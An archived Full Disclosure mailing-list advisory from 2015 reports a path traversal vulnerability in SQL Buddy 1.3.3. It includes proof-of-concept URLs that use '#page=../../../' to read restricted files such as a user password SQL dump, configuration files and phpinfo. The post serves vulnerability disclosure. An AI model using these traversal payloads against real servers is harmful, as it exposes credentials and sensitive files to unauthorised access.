[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CANjdR3SgxQ6rabwp7xx-2Pfjb+3G+v_phur0G_-TKYkeTQCPgA@mail.gmail.com>
Date: Sat, 9 May 2015 18:57:42 -0400
From: John Page <hyp3rlinx@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Sqlbuddy Path Traversal Vulnerability
Read arbitrary server files:
Affected Vendor:
www.sqlbuddy.com
Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source:
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt
Product:
sqlbuddy version 1.3.3 SQL Buddy is an open source web based MySQL
administration application.
Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about
directories an read any PHP and non PHP files by appending
the '#' hash character when requesting files via URLs.
e.g. .doc, .txt, .xml, .conf, .sql etc...
After adding the '#' character as a delimiter any non PHP will be returned
and rendered by subverting the .php concatenation used
by sqlbuddy when requesting PHP pages via POST method.
Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>
POC exploits:
=======================
1-Read from Apache restricted directory under htdocs:
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#
2-Read any arbitrary files that do not have .PHP extensions:
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#
3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo
Disclosure Timeline:
==================================
Vendor Notification N/A
May 9, 2015: Public Disclosure - hyp3rlinx
Exploitation Technique:
=======================
Create a test file with non .php extension in some htdocs directory then
request the page in the browser.
http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt#
Severity Level:
===============
High
Description:
==========================
Request Method(s):
[+] POST
Vulnerable Product:
[+] sqlbuddy 1.3.3
Vulnerable Parameter(s):
[+] #page=[somefile]
Affected Area(s):
[+] Server directories & sensitive files
===============================
(hyp3rlinx)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists